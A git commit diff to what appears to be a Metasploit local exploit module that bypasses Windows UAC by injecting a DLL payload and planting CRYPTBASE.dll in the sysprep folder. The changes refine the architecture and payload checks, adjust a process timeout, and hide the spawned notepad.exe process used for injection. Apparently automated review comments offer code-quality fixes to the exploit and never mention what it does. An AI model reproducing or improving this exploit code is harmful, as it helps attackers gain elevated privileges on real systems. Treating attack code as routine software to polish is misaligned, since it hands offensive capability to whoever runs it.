Better arch checking

bug/bundler_fix
Meatballs 2013-09-27 09:39:29 +01:00
parent dfac7b57d2
commit c3c07b5fd7
2 changed files with 5 additions and 5 deletions


@ -72,7 +72,7 @@ void exploit()
if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
{
WaitForSingleObject(shinfo.hProcess, 50);
WaitForSingleObject(shinfo.hProcess, 200);
TerminateProcess(shinfo.hProcess, 0); // Even better if the template payload.dll calls ExitProcess
CloseHandle(shinfo.hProcess);
}
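Review bot: The new timeout in `WaitForSingleObject(shinfo.hProcess, 200);` is an unexplained magic number, and neither the code nor the commit message says why 50 ms was too short. A named constant with a one-line comment would document the intent, for example `#define CHILD_WAIT_MS 200 /* grace period before the spawned process is terminated */`. The wait's return value is also discarded, so the code cannot tell a process that has exited from one that timed out before `TerminateProcess` runs. exploit() starts and ends outside the hunk.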


@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Local
has the UAC flag turned off. This module uses the Reflective DLL Injection
technique to drop only the DLL payload binary instead of three seperate
binaries in the standard technique. However, it requires the correct
architecture to be selected.
architecture to be selected, (use x64 for SYSWOW64 systems also).
},
'License' => MSF_LICENSE,
'Author' => [
@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Local
# decide, x86 or x64
sysarch = sysinfo["Architecture"]
if sysarch =~ /x64/i
unless target_arch.first == 'x86_64'
unless(target_arch.first =~ /64/i) and (datastore['PAYLOAD'] =~ /64/i)
fail_with(
Exploit::Failure::BadConfig,
"x86 Target Selected for x64 System"
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local
register_files_for_cleanup("#{windir}\\System32\\sysprep\\CRYPTBASE.dll")
end
else
if target_arch.first =~ /x64/i
if (target_arch.first =~ /64/i) or (datastore['PAYLOAD'] =~ /64/i)
fail_with(
Exploit::Failure::BadConfig,
"x64 Target Selected for x86 System"
@ -175,7 +175,7 @@ class Metasploit3 < Msf::Exploit::Local
print_status("Spawning process with Windows Publisher Certificate, to inject into...")
cmd = "#{windir}\\System32\\notepad.exe"
proc = client.sys.process.execute(cmd, nil, {'Hidden' => false })
proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
if proc.nil? or proc.pid.nil?
fail_with(Exploit::Failure::Unknown, "Spawning Process failed...")
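Review bot: The failure messages no longer match the conditions that raise them: in the hunk at -120 the check now also fails when only `datastore['PAYLOAD']` lacks "64", yet it still reports "x86 Target Selected for x64 System", and the hunk at -137 has the mirror-image problem with "x64 Target Selected for x86 System". Naming both inputs, e.g. `"x86 target or payload selected for x64 system"`, would tell the operator which setting to correct. The unanchored `/64/i` accepts any string containing "64", and `and`/`or` bind more loosely than `&&`/`||`, so `unless target_arch.first =~ /64/i && datastore['PAYLOAD'] =~ /64/i` is the more conventional form. The enclosing method starts and ends outside these hunks.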